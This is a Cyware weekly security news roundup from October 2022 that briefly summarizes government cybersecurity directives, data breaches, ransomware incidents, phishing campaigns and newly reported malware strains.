Share Blog Post
- The CISA has issued guidance regarding the transition to TLP version 2.0. While the federal authority plans to migrate to the new protocol in November, it has urged organizations to adopt the same as soon as possible. The key updates of this version are TLP:CLEAR, TLP: AMBER+STRICT—they enable sharing of sensitive information more effectively.
- The CISA has issued a new Binding Operation Directive that mandates all federal civilian agencies to scan their networks and discover vulnerable systems that need to be patched. Furthermore, the agencies are required to share their findings with the CISA by April 2023.
- The Department of Homeland Security kicked off ‘Cybersecurity Awareness Month’ as it stressed its commitment to raising awareness about how to combat the ever-increasing threats from malicious cyber actors. It has also encouraged private-public sector collaboration for threat-sharing and streamlining cybersecurity efforts.
- CommonSpirit Health disclosed a cybersecurity incident that impacted several of its healthcare facilities across the U.S. Investigations are underway to understand the scope and size of the incident.
- Binance temporarily paused its Binance Smart Chain (BSC) blockchain bridge project after $560 million worth of Binance coins were stolen by hackers. However, the firm was quick to respond and blocked the hackers’ access to roughly 80% of the stolen funds.
- A data breach at the Shangri-La hotel group compromised the personal information of its customers. The breach occurred between May and July after hackers gained unauthorized access to its IT network. This impacted the hotels located in Hong Kong, Singapore, Chiang Mai, Taipei, and Tokyo. The organization ascertained no indication of any guest data being misused.
- The relatively new RansomEXX ransomware gang has leaked internal documents online after claiming to have hacked the Italian luxury sports car manufacturer Ferrari. While the firm has validated the documents leaked online, there is no evidence of cyberattacks according to Ferrari. The 6.99GB of stolen data includes internal documents, datasheets, and repair manuals, among others.
- Russian retail chain DNS (Digital Network System) suffered a data breach that exposed the personal information of customers and employees. The attackers could gain initial access by exploiting flaws in the company’s IT systems. Meanwhile, the organization is working on fixing the flaws to strengthen information security.
- More than 248,000 files belonging to the Los Angeles Unified School District (LAUSD) have been leaked on the dark web. The affected data belongs to students and their parents. The school was attacked by the Vice Society ransomware gang in September.
- Scammers are impersonating security researchers to sell fake PoC exploits for the newly discovered ProxyNotShell vulnerabilities. The flaws have gained traction among cybercriminals as they are being exploited in the wild, which is enabling scammers to earn profit by selling fake exploits.
- KFC and McDonald’s customers across Saudi Arabia, the UAE, and Singapore were targeted in a phishing attack, enabling attackers to steal their payment details. According to researchers at CloudSEK, the attackers impersonated the browser-based application of fast food restaurants to trick users into installing information-stealing payloads on their desktops.
- Threat actors are abusing Chrome’s Application Mode feature in a new phishing attack to steal credentials from internet users. The feature is available in all Chromium-based browsers, including Google Chrome, Microsoft Edge, and Brave Browser, enabling threat actors to spoof local login forms that appear as desktop applications.
- In a joint advisory, the NSA, the CISA, and the FBI warned that threat actors used an open-source tool named Impacket to gain an initial foothold inside the network of a U.S. Defense Industrial Base organization. The advisory also mentions the use of a custom tool called Covalent Stealer to exfiltrate data from victims’ systems.
- The group behind the Magniber ransomware is constantly changing its distribution method to bypass detections. After changing the extension from JSE to JS on September 16, the attackers have yet again modified the file extension from JS to WSF.
- Zimperium researchers observed a campaign associated with a lesser-known Android spyware strain, named RatMilad. The spyware is disguised as a mobile VPN app that is promoted on a Telegram channel. It targets Middle Eastern enterprise mobile devices.
- The NSA, CISA, and the FBI have published a joint advisory with a list of the top 20 vulnerabilities exploited by Chinese state-sponsored threat groups. Most of these flaws are related to different remote code execution flaws affecting products from Atlassian, Microsoft Exchange, F5 Big-IP, ZOHO, and Sitecore XP.
- A new infostealer named LilithBot has been linked to a Russia-based threat actor group called Jester, which has been active since January. The malware is being distributed via a dedicated Telegram group and a Tor link.
- Some malicious Office documents that attempt to leverage legitimate websites were discovered executing a shell script that ultimately dropped variants of Agent Tesla and njRAT. The trojans are well-known for collecting sensitive information from a victim’s device.
- A newly identified campaign used a popular Chinese YouTube channel to distribute spyware-laced versions of the Tor browser. The spyware campaign, named OnionPoison, collected data such as browsing history, social networking account IDs, and Wi-Fi network identifiers.
- Attackers imitated the Raw-Tool PyPI package library to hide their malicious code using base64 encoding. This enabled the attackers to evade detection during the infection process.
- BlackByte ransomware group is employing a new evasion tactic that involves the abuse of known vulnerabilities in over 1,000 drivers, on which security products rely to provide protection. One of these vulnerable drivers is RTCore64.sys.
- Researchers investigated a Cheerscrypt ransomware attack that utilized Night Sky ransomware TTPs. Believed to be the work of the Emperor Dragonfly threat actor, the ransomware is capable of targeting both Windows and Linux ESXi environments.
Posted on: October 07, 2022
More from Cyware
Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.
Explore Industry Briefs
Cyware for Enterprise
Adopt next-gen security with threat intelligence analysis, security automation...
Cyware for ISACs/ISAOs
Anticipate, prevent, and respond to threats through bi-directional threat in...